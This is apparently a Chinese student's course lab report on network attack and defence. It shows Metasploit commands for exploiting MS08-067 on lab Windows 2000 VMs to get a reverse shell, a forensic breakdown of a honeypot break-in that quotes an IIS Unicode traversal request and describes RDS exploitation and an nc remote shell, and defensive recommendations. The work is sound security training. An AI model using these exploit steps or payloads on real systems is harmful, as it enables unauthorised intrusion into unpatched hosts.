20232831袁思承2023-2024-2 《网络攻防实践》第6次作业


目录


20232831袁思承 2023-2024-2 《网络攻防实践》第6次作业

1.实验内容

(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/Kali攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

(2)取证分析实践:解码一次成功的NT系统破解攻击
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。并回答以下问题:

bash 复制代码
1、攻击者使用了什么破解工具进行攻击?
2、攻击者如何使用这个破解工具进入并控制了系统?
3、攻击者获得系统访问权限后做了什么?
4、我们如何防止这样的攻击?
5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?

(3)团队对抗实践:windows系统远程渗透攻击和分析
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

2.实验过程

(1)动手实践Metasploit windows attacker

虚拟机名称 IP地址
Kali-Linux攻击机 192.168.200.4
Win2kServer_SP0_target靶机 192.168.200.124

检查一下攻击机与靶机之间的连通性如下:

首先,在Kali虚拟机中使用命令进入到Metasploit

bash 复制代码
msfconsole

输入以下命令调用MS08-067漏洞以实现相关的攻击,从而利用MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

bash 复制代码
use exploit/windows/smb/ms08_067_netapi

输入以下命令显示可用的攻击负载

bash 复制代码
show payloads

选择以下攻击负载以实现反向连接

bash 复制代码
set payload generic/shell_reverse_tcp

设置远程渗透攻击的相关信息,即设置攻击目标IP,设置本机IP,再使用show options查看设置的信息:

bash 复制代码
set RHOST 192.168.200.124
set LHOST 192.168.200.4
show options

输入以下命令进行攻击

bash 复制代码
exploit

攻击成功,进入对方的主机,利用以下命令进行靶机的ip查看

bash 复制代码
ipconfig

创建一个文件夹

bash 复制代码
mkdir ysc

从wireshark中可以查看这次攻击

成功获取目标主机的访问权!

(2)取证分析实践:解码一次成功的NT系统破解攻击

本处实验需要回答以下5个问题:

1、攻击者使用了什么破解工具进行攻击?

2、攻击者如何使用这个破解工具进入并控制了系统?

3、攻击者获得系统访问权限后做了什么?

4、我们如何防止这样的攻击?

5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?

首先,下载好snort-0204@0117.log文件后,在Kali中使用wireshark将其打开

整体查看文件该日志后,可以发现双方IP地址分别为213.116.251.162和172.16.1.106,且存在大量的HTTP、TCP流,以及少量的FTP流。通过简单查看后,不难发现213.116.251.162为攻击者,172.16.1.106为靶机。(当然实验本身也已经说明...)

首先,使用以下命令为筛选条件来依次查看HTTP流

bash 复制代码
ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106 && http

跟踪TCP流能发现,攻击者在SESSION:1765-80中成功进行了Unicode攻击以打开NT系统启动文件boot.ini,其request为:GET /guest/default,asp/...%C0%AF./...%C0%AF...1...%C0%AF.../boot.ini HTTP/1.1。因此可以推测存在UNICODE编码漏洞攻击。

在接下来的TCP中可以发现,攻击者探测了/msadc/msadcs.dll的存在,并在SESSION:1771-80中通过msadcs.d中存在RDS漏洞,即MS02-065 。此后,他进行了SQL注入,获取了权限。根据"ADM!ROX!YOURIWORLD"特征字符串,以及查询语中使用了dbg=c:\winnt\help\iis\htmtutorial\btcustmr.mdb,通过上网查询,可以得知这次攻击是由rain forest puppy 编写的 msadc(2).pl 渗透攻击代码所发起的,攻击者从此获取并成功进入了shell。至此,攻击者通过查点确认了目标系统提供Web服务的是ⅡSv4.0,并存在Unicode 和 MDAC RDS 安全漏洞,可进行进一步渗透攻击。

攻击者通过蜜网主机下载了所指定的一些文件,并通过 nc构建其一个远程 shell 通道。此后,攻击者连接 6969 端口,获得了访问权,并进入了交互式控制阶段。

攻击者看试查看文件:

删除了ftpcom文件

尝试获取密码,以及后续查看本地用户、用户组、管理员账户等等

删除SAM数据库中的数据(拷贝和删除har.txt),以提升权限。

尝试获取管理员administrator权限

通过以下内容可知攻击者发现攻击目标为蜜罐主机

接下来依次回答 问题:
1、攻击者使用了什么破解工具进行攻击?

攻击者通过IIS Unicode漏洞,使用了Unicode攻击(针对MS00-078/MS01-026),还利用针对msadcs.dll中RDS漏洞(MS02-065)的msadc.pl/msadc2.pl 渗透攻击工具进行了攻击。
2、攻击者如何使用这个破解工具进入并控制了系统?

攻击者利用Unicode攻击和针对msadcs.dll中RDS漏洞的渗透攻击工具,成功进入了Shell,并获取权限从而控制了系统。通过Unicode攻击了解了被攻击主机操作系统的一些基本情况,发现无法成功获取系统访问权限后,再利用RDS漏洞进行了SQL注入攻击,最终获取了系统访问权限,并给自己创建了一个高权限的用户,达到控制系统的目的。
3、攻击者获得系统访问权限后做了什么?

攻击者获取了系统权限后,仍然尝试获取本地administrator的权限,因此他进行了各种尝试,试图通过删除SAM数据库中的数据(拷贝和删除har.txt)和将自己加到管理员组中的方式来实现提升自己访问权限的目的。
4、我们如何防止这样的攻击?

1、加强口令策略,包括定期更换口令、设置复杂度要求等,以防止口令被猜解或破解。

2、及时安装系统补丁和更新,以修补已知漏洞,减少攻击面。

3、使用入侵检测系统(IDS)和入侵防御系统(IPS)监控和阻止潜在的恶意流量和行为。

4、部署网络防火墙和访问控制列表(ACL)限制外部对系统的访问。

5、定期审计系统日志,及时发现异常行为并采取相应的应对措施。

6、禁用一些平时不用的服务例如RDS。

7、使用IS Lockdown和URLScan等工具加强 web server

5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?

是的,因为最后攻击者创建了rfp.txt文件并向文件中输入了以下内容,即"我到这才发现了这是蜜罐主机(笑脸)"。因为该目标主机作为rfp的个人网站,Wcb服务所使用的ⅡS甚至没有更新mp自己所发现的 MDAC RDS 安全漏洞,很容易让攻击者意识到这绝对是台诱饵。

C:>echo best honeypot i've seen till now : )

(3)团队对抗实践:windows系统远程渗透攻击和分析

①攻击实践
虚拟机名称 IP地址
Kali-Linux攻击机(袁思承) 192.168.126.201
Win2kServer_SP0_target靶机 (祝浩宣) 192.168.126.141

这部分,为了实现在同一网段下,必须得将二者均采用桥接模式或者将Vmnet0设置为桥接模式(注意,由于均是笔记本连接wifi做实验,必须得将桥接的网卡设置为无线网卡,这里是Intel®Wireless-Ac 9560 160MHz,否则将连接不上外界主机网络,导致实验双方不能在同一网段)

即攻防双方设置Kali-Linux攻击机和Win2kServer_SP0_target靶机均在桥接模式下。

首先,查看自己的Kali攻击机的IP为:

bash 复制代码
192.168.126.201

ping对方的靶机如下:

bash 复制代码
192.168.126.141

根据上述(1)中的实验过程,对该IP地址的Win2kServer_SP0_target靶机进行攻击,首先使用以下命令打开Metasploit

bash 复制代码
msfconsole

输入以下命令调用MS08-067漏洞以实现相关的攻击,从而利用MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

bash 复制代码
use exploit/windows/smb/ms08_067_netapi

输入以下命令显示可用的攻击负载

bash 复制代码
show payloads

选择以下攻击负载以实现反向连接

bash 复制代码
set payload generic/shell_reverse_tcp

设置远程渗透攻击的相关信息,即设置攻击目标IP,设置本机IP,再使用show options查看设置的信息:

bash 复制代码
set RHOST 192.168.126.141
set LHOST 192.168.126.201
show options

输入以下命令进行攻击

bash 复制代码
exploit

攻击成功,进入对方的主机,利用以下命令进行对方ip的查看,成功获取

bash 复制代码
ipconfig

使用以下命令在对方主机中创建文件夹并进入文件夹

bash 复制代码
mkdir yuansichengiscoming!
cd yuansichengiscoming!

查看对方的主机,能够看见已经成功创建该文件夹:

②防御实践
虚拟机名称 IP地址
Kali-Linux攻击机(祝浩宣) 192.168.126.125
Win2kServer_SP0_target靶机 (袁思承) 192.168.126.79

首先,将靶机设置为Vmnet0网段的桥接模式:

然而,即使设置为了桥接模式,仍然无法联网,会出现例如IP与同网段中的IP出现冲突,导致ip地址为0.0.0.0的情况,又或者是直接没有网络等等问题。通过寻找方法,需要将靶机的IP地址改为自动获取才可以使得攻防双方拥有同一网段的IP。

自动获取IP后,能自动分配到以下ip

bash 复制代码
192.168.126.79

首先检查攻防双方是否能够互联,使用ping指令进行检测,发现能够ping通:

bash 复制代码
ping 192.168.126.125

被对方攻击后,首先发现自己的主机中多了对方创建的文件夹zhuhaoxuan

使用wireshark抓包能够发现对方的TCP流以及各类操作:

跟踪TCP流发现,对方入侵我的主机以后使用了以下命令:

3.学习中遇到的问题及解决

  • 问题:Win2k直连后无法上网,或者出现IP为0.0.0.0的情况
  • 问题解决方案:将Win2k改为随机获取IP地址,而不是使用指定IP地址

4.学习感悟、思考等

通过本次实验,我学习了如何使用msfconsole工具进行对靶机的漏洞攻击,同时分析了一次成功的NT系统破解攻击,最后与同学进行了攻防实战演练,加深了我对Windows系统远程渗透攻击的理解,并学习了解了防范和应对漏洞攻击的方法。

参考资料

相关推荐
安步当歌34 分钟前
【WebRTC】视频发送链路中类的简单分析(下)
网络·音视频·webrtc·视频编解码·video-codec
米饭是菜qy1 小时前
TCP 三次握手意义及为什么是三次握手
服务器·网络·tcp/ip
yaoxin5211231 小时前
第十九章 TCP 客户端 服务器通信 - 数据包模式
服务器·网络·tcp/ip
鹿鸣天涯2 小时前
‌华为交换机在Spine-Leaf架构中的使用场景
运维·服务器·网络
星海幻影2 小时前
网络基础-超文本协议与内外网划分(超长版)
服务器·网络·安全
WeeJot嵌入式2 小时前
网络百问百答(一)
网络
湖南罗泽南2 小时前
p2p网络介绍
网络·网络协议·p2p
IPdodo全球网络3 小时前
解析“ChatGPT网络错误”:从网络专线到IP地址的根源与解决方案
网络·tcp/ip·chatgpt
腾科张老师4 小时前
为什么要使用Ansible实现Linux管理自动化?
linux·网络·学习·自动化·ansible
Sweet_vinegar4 小时前
Wireshark
网络·测试工具·安全·wireshark·ctf·buuctf